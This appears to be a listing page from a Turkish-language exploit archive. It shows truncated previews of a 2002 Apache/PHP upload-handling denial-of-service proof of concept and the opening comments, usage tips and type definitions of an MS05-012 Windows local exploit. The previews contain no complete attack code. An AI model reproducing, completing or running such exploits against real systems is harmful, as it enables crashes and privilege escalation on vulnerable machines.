Local Exploit
Apache+php Proof of Concept Exploit
/*
---------------------------------------------------------------------------
Web: http://qb0x.net Author: Gabriel A. Maggiotti
Date: Febrary 03, 2002 E-mail: gmaggiot@ciudad.com.ar
---------------------------------------------------------------------------
Summary
-------
This is a proof of concept exploit for Apache/1.3.x + php_4.0.6. This
code exploit multipart/form-data POST requests bug. This code only crash
apache deamon, not open any shell or execute code in the remote server.
PHP supports multipart/form-data POST requests (as described in RFC1867)
known as POST fileuploads. Unfourtunately there are several flaws in the
php_mime_split function that could be used by an attacker to execute arbi-
trary code. I dont know if the vuln I exploit is a known vuln or not.- Yorum göndermek için giriş yapın veya kayıt olun
- Devamını oku
Microsoft Windows COM Structured Storage Local Exploit (MS05-012)
// by Cesar Cerrudo - Argeniss - www.argeniss.com
// MS05-012 - COM Structured Storage Vulnerability - CAN-2005-0047 Exploit
//
// More exploits at www.argeniss.com/products.html
//
// Works on Win2k sp4, WinXP sp2, Win2k3 sp0
// Close all runing programs to avoid possible problems
// If it finds the section and it doesn't work remove section permissions
// from msiexec service process with WinObj or crash the msiexec service and try again
// if offsets don't work, debug and change them
#include <windows.h>
#include <stdio.h>
typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef struct _OBJDIR_INFORMATION {
UNICODE_STRING ObjectName;
UNICODE_STRING ObjectTypeName;
BYTE Data[1];
} OBJDIR_INFORMATION;- Yorum göndermek için giriş yapın veya kayıt olun
- Devamını oku
Son yorumlar
20 saat 18 dakika önce
1 gün 1 saat önce
2 gün 21 saat önce
4 hafta 2 gün önce
5 hafta 3 gün önce
7 hafta 5 gün önce
9 hafta 4 gün önce
9 hafta 4 gün önce
9 hafta 4 gün önce
9 hafta 4 gün önce